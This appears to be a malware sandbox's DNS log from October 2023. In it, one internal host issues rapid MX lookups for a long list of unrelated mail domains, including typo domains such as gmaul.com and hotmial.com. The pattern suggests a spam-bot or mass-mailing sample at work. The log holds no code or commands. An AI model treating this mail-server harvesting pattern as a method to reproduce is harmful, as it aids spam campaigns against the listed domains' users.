                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.968318939 CEST192.168.2.3185.67.45.2310xac19Standard query (0)tovarish.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.968969107 CEST192.168.2.31.1.1.10xe150Standard query (0)ns1.locaweb.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.133991003 CEST192.168.2.3186.202.8.2540x481aStandard query (0)cury.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.134681940 CEST192.168.2.3156.154.132.2000x481aStandard query (0)bienydebuenas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.135585070 CEST192.168.2.3156.154.132.2000x481aStandard query (0)xoxy.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.136024952 CEST192.168.2.3162.159.24.100x481aStandard query (0)enggwarestaging.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.138014078 CEST192.168.2.3194.0.6.10x581aStandard query (0)vlad.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.138839960 CEST192.168.2.31.1.1.10xb673Standard query (0)c.ns.ac-versailles.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.157083035 CEST192.168.2.31.1.1.10x8aStandard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.631865978 CEST192.168.2.31.1.1.10xfec2Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.928946018 CEST192.168.2.3195.83.95.30x301eStandard query (0)ac-paris.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.929482937 CEST192.168.2.3217.160.82.2440x301eStandard query (0)monicol.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.929950953 CEST192.168.2.313.248.158.1590x301eStandard query (0)whrlaw.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:33.930541039 CEST192.168.2.31.1.1.10xed3fStandard query (0)ns1.websupport.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.002958059 CEST192.168.2.31.1.1.10xb86aStandard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.262195110 CEST192.168.2.345.10.97.110xe61fStandard query (0)ardaco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.262195110 CEST192.168.2.31.1.1.10xe099Standard query (0)pat.ns.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.427908897 CEST192.168.2.31.1.1.10x29fcStandard query (0)ns9.zoneedit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.427943945 CEST192.168.2.3108.162.192.1390xf21Standard query (0)s-sm.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.641604900 CEST192.168.2.3139.177.204.420xe921Standard query (0)ginospizza.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.641654968 CEST192.168.2.3162.159.26.1100xe921Standard query (0)moldmasters.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.642256975 CEST192.168.2.313.248.158.1590xe921Standard query (0)iclud.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.642729044 CEST192.168.2.397.74.98.670xe921Standard query (0)refinedprojects.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.653580904 CEST192.168.2.3156.154.133.2000xf921Standard query (0)availabledatingworld.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.653948069 CEST192.168.2.3180.163.194.1340xf921Standard query (0)genhr.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.654781103 CEST192.168.2.391.195.241.80xf921Standard query (0)dead.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.654829025 CEST192.168.2.3169.241.10.140xf921Standard query (0)nv.ccsd.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.655294895 CEST192.168.2.350.87.144.830xf921Standard query (0)compzon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.656467915 CEST192.168.2.31.1.1.10xa06aStandard query (0)ns-1680.awsdns-18.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.656471014 CEST192.168.2.3199.43.135.530xf921Standard query (0)coe.intMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.751492023 CEST192.168.2.31.1.1.10xbbcaStandard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.833229065 CEST192.168.2.3205.251.198.1440x2223Standard query (0)memorialhermann.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.833848953 CEST192.168.2.31.1.1.10xa603Standard query (0)a9-66.akam.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.889230967 CEST192.168.2.31.1.1.10xa5a7Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.998146057 CEST192.168.2.3184.85.248.660xce23Standard query (0)chpnet.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:34.998753071 CEST192.168.2.3108.162.194.30xce23Standard query (0)harlandassociates.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.012861013 CEST192.168.2.364.70.19.800xdd23Standard query (0)krim.wsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.013377905 CEST192.168.2.3173.199.96.960xdd23Standard query (0)minglebox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.014060020 CEST192.168.2.3162.159.24.2010xdd23Standard query (0)gulatiexports.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.014350891 CEST192.168.2.3109.122.98.1140xdd23Standard query (0)vektor.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.015294075 CEST192.168.2.364.98.148.1370xdd23Standard query (0)platinumthree.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.015295029 CEST192.168.2.3162.159.24.1170xdd23Standard query (0)cdd.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.015939951 CEST192.168.2.3156.154.132.2000xdd23Standard query (0)mailnesia.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.016762018 CEST192.168.2.31.1.1.10xae13Standard query (0)ns6.oleane.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.450612068 CEST192.168.2.31.1.1.10x7d1eStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.462713003 CEST192.168.2.31.1.1.10x80caStandard query (0)ns1049.ui-dns.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.462713003 CEST192.168.2.3194.2.0.60x9c26Standard query (0)onet.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.669203043 CEST192.168.2.3217.160.80.490x7727Standard query (0)cci-dialog.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.685106039 CEST192.168.2.31.1.1.10x37a9Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.796530962 CEST192.168.2.31.1.1.10xa94bStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.841188908 CEST192.168.2.31.1.1.10x8c04Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:35.935930014 CEST192.168.2.31.1.1.10x66ddStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.029021978 CEST192.168.2.3192.12.94.300x6b29Standard query (0)kelon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.029932976 CEST192.168.2.3216.239.32.990x6b29Standard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.030421019 CEST192.168.2.3192.12.94.300x6b29Standard query (0)net-up.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.031378031 CEST192.168.2.3192.12.94.300x6b29Standard query (0)power-trac.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.036294937 CEST192.168.2.345.142.220.390x6b29Standard query (0)whitemc.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.044766903 CEST192.168.2.3193.0.14.1290x7b29Standard query (0)bt.pfMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.045401096 CEST192.168.2.3192.12.94.300x7b29Standard query (0)spatial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.046221018 CEST192.168.2.3192.31.80.300x7b29Standard query (0)starpoint.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.047224998 CEST192.168.2.3185.159.196.20x7b29Standard query (0)uoit.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.047854900 CEST192.168.2.3199.19.56.10x7b29Standard query (0)bettzedek.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.048376083 CEST192.168.2.3192.12.94.300x7b29Standard query (0)vision-bg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.048966885 CEST192.168.2.3192.31.80.300x7b29Standard query (0)sbcglobqal.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.049954891 CEST192.168.2.3156.154.100.30x7b29Standard query (0)bedmod.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.051132917 CEST192.168.2.3192.12.94.300x7b29Standard query (0)3dplmsoftware.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.052917004 CEST192.168.2.3192.12.94.300x7b29Standard query (0)my.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.060307980 CEST192.168.2.3185.159.196.20x8a29Standard query (0)crvi.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.060952902 CEST192.168.2.3192.12.94.300x8a29Standard query (0)blog-galaxy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.061923981 CEST192.168.2.3192.12.94.300x8a29Standard query (0)bulldognews.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.061947107 CEST192.168.2.3192.31.80.300x8a29Standard query (0)harlandale.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.062524080 CEST192.168.2.3195.243.137.260x8a29Standard query (0)nu.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.063255072 CEST192.168.2.3192.12.94.300x8a29Standard query (0)cdw.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.063822985 CEST192.168.2.3192.31.80.300x8a29Standard query (0)4uservizi.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.064764977 CEST192.168.2.3192.12.94.300x8a29Standard query (0)cbse.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.065582037 CEST192.168.2.3192.12.94.300x8a29Standard query (0)tspl-india.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.066329956 CEST192.168.2.3192.12.94.300x8a29Standard query (0)juliemusic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.075764894 CEST192.168.2.3204.61.216.1050x9a29Standard query (0)mesp.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.076606989 CEST192.168.2.3192.31.80.300x9a29Standard query (0)hanamail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.078032970 CEST192.168.2.31.1.1.10x6682Standard query (0)dns1.a1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.394567966 CEST192.168.2.380.120.17.260x5f2bStandard query (0)adler-lacke.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.395123959 CEST192.168.2.3192.12.94.300x5f2bStandard query (0)virusadv.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.395593882 CEST192.168.2.3194.0.14.10x5f2bStandard query (0)jees.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.396687984 CEST192.168.2.3162.159.26.1360x5f2bStandard query (0)asorent.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.396687984 CEST192.168.2.3192.12.94.300x5f2bStandard query (0)bc.dmgarch.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.397274971 CEST192.168.2.3192.12.94.300x5f2bStandard query (0)kierson.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.398188114 CEST192.168.2.3192.12.94.300x5f2bStandard query (0)livejournali.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.398188114 CEST192.168.2.3192.12.94.300x5f2bStandard query (0)antiochgolfclub.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.406075001 CEST192.168.2.3192.12.94.300x6f2bStandard query (0)oktavist.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.406795979 CEST192.168.2.3161.53.160.1000x6f2bStandard query (0)os.t-com.hrMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.407390118 CEST192.168.2.3103.224.182.50x6f2bStandard query (0)outook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.408301115 CEST192.168.2.3192.12.94.300x6f2bStandard query (0)mailsdfeer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.408301115 CEST192.168.2.3192.12.94.300x6f2bStandard query (0)turner.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.409205914 CEST192.168.2.3192.12.94.300x6f2bStandard query (0)emael.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.409513950 CEST192.168.2.3198.97.190.530x6f2bStandard query (0)kotic.nlMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.409780025 CEST192.168.2.3192.12.94.300x6f2bStandard query (0)optimagroupinc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.410330057 CEST192.168.2.3192.12.94.300x6f2bStandard query (0)pfizer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.410968065 CEST192.168.2.3194.69.254.10x6f2bStandard query (0)us.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.419394016 CEST192.168.2.3192.12.94.300x7e2bStandard query (0)aqua-aerobic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.420351028 CEST192.168.2.3195.243.137.260x7e2bStandard query (0)lieblingslied-records.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.420351982 CEST192.168.2.365.22.196.10x7e2bStandard query (0)dgaccountants.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.420893908 CEST192.168.2.3192.12.94.300x7e2bStandard query (0)sabrain.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.421458960 CEST192.168.2.3192.31.80.300x7e2bStandard query (0)mainstaycomm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.421938896 CEST192.168.2.3192.12.94.300x7e2bStandard query (0)bhalotiainternational.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.422552109 CEST192.168.2.3192.31.80.300x7e2bStandard query (0)cei.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.423099041 CEST192.168.2.3192.31.80.300x7e2bStandard query (0)evertek.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.423583984 CEST192.168.2.3199.19.56.10x7e2bStandard query (0)mcvts.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.425215960 CEST192.168.2.3192.12.94.300x7e2bStandard query (0)vizi0n.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.434871912 CEST192.168.2.3162.159.48.970x8e2bStandard query (0)event.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.435882092 CEST192.168.2.3192.12.94.300x8e2bStandard query (0)icandi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.436808109 CEST192.168.2.3162.159.26.1360x8e2bStandard query (0)asorent.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.436808109 CEST192.168.2.3192.12.94.300x8e2bStandard query (0)parkbelles.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.437418938 CEST192.168.2.3193.176.144.220x8e2bStandard query (0)ch-agen-nerac.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.437928915 CEST192.168.2.3192.31.80.300x8e2bStandard query (0)onelinkpr.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.438468933 CEST192.168.2.3185.159.196.20x8e2bStandard query (0)allstate.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.439433098 CEST192.168.2.3192.12.94.300x8e2bStandard query (0)cellutissue.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.439433098 CEST192.168.2.3204.61.216.1050x8e2bStandard query (0)correiaecorreia.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.440083027 CEST192.168.2.3192.12.94.300x8e2bStandard query (0)doublea1991.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.450730085 CEST192.168.2.3192.31.80.300x9e2bStandard query (0)vipmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.451653957 CEST192.168.2.3192.12.94.300x9e2bStandard query (0)hlag.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.451915026 CEST192.168.2.3192.12.94.300x9e2bStandard query (0)fibertel.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.453064919 CEST192.168.2.3192.12.94.300x9e2bStandard query (0)certifiedtileandmarble.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.453067064 CEST192.168.2.3156.154.100.30x9e2bStandard query (0)plumlogo.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.454109907 CEST192.168.2.3192.12.94.300x9e2bStandard query (0)vivienvitolo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.454122066 CEST192.168.2.3192.31.80.300x9e2bStandard query (0)mailsadf.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.455326080 CEST192.168.2.3156.154.100.30x9e2bStandard query (0)littlebrown.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.455626965 CEST192.168.2.3130.226.213.1380x9e2bStandard query (0)delta.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.455913067 CEST192.168.2.3162.159.26.1360x9e2bStandard query (0)asorent.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.466109037 CEST192.168.2.31.1.1.10xc8caStandard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.466454983 CEST192.168.2.3192.31.80.300xad2bStandard query (0)paulbunyan.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.466775894 CEST192.168.2.3195.243.137.260xad2bStandard query (0)productivitymind.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.467334986 CEST192.168.2.3192.31.80.300xad2bStandard query (0)sbcglo0bal.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.467933893 CEST192.168.2.3192.12.94.300xad2bStandard query (0)fsrinc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.468424082 CEST192.168.2.3192.12.94.300xad2bStandard query (0)globo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.469002008 CEST192.168.2.3192.12.94.300xad2bStandard query (0)selectivemetals.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.470242023 CEST192.168.2.3193.176.144.220xad2bStandard query (0)archi3.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.470818043 CEST192.168.2.380.120.17.260xad2bStandard query (0)adler-lacke.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.471225977 CEST192.168.2.3192.12.94.300xad2bStandard query (0)wesco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.471759081 CEST192.168.2.3192.12.94.300xad2bStandard query (0)mavenir.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.481904030 CEST192.168.2.3194.0.14.10xbd2bStandard query (0)fermo.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.482471943 CEST192.168.2.3192.31.80.300xbd2bStandard query (0)dcdi.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.482912064 CEST192.168.2.3192.12.94.300xbd2bStandard query (0)hotmial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.483705044 CEST192.168.2.345.142.220.390xbd2bStandard query (0)riminireservation.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.483705997 CEST192.168.2.3192.12.94.300xbd2bStandard query (0)nusantaramotor.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.484190941 CEST192.168.2.3192.12.94.300xbd2bStandard query (0)hostcalls.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.484694958 CEST192.168.2.3192.12.94.300xbd2bStandard query (0)antares-design.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.485131979 CEST192.168.2.3192.12.94.300xbd2bStandard query (0)rxlps.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.486000061 CEST192.168.2.3192.12.94.300xbd2bStandard query (0)harrahs.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.486000061 CEST192.168.2.3192.12.94.300xbd2bStandard query (0)lectotum.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.497390985 CEST192.168.2.3192.100.224.10xcd2bStandard query (0)prodigy.net.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.497917891 CEST192.168.2.3192.12.94.300xcd2bStandard query (0)cfremails.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.498418093 CEST192.168.2.345.142.220.390xcd2bStandard query (0)i3p.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.498806953 CEST192.168.2.3199.9.14.2010xcd2bStandard query (0)emails-like-snails.bidMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.499605894 CEST192.168.2.3192.12.94.300xcd2bStandard query (0)myfam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.499604940 CEST192.168.2.3192.31.80.300xcd2bStandard query (0)nktelco.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.500122070 CEST192.168.2.3192.12.94.300xcd2bStandard query (0)getlostxx.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.500929117 CEST192.168.2.3192.12.94.300xcd2bStandard query (0)mail-th.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.500927925 CEST192.168.2.3194.0.6.10xcd2bStandard query (0)ovam.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.501389027 CEST192.168.2.3192.12.94.300xcd2bStandard query (0)mcpe.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.512945890 CEST192.168.2.3192.12.94.300x782cStandard query (0)hanaw.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.513480902 CEST192.168.2.3192.12.94.300x782cStandard query (0)huskyenergy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.514086008 CEST192.168.2.3204.61.216.1050x782cStandard query (0)buildness.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.514763117 CEST192.168.2.3192.12.94.300x782cStandard query (0)veeam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.515259981 CEST192.168.2.3192.12.94.300x782cStandard query (0)6clo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.518155098 CEST192.168.2.3192.31.80.300x782cStandard query (0)gtdel.netMX (Mail exchange)IN (0x0001)false
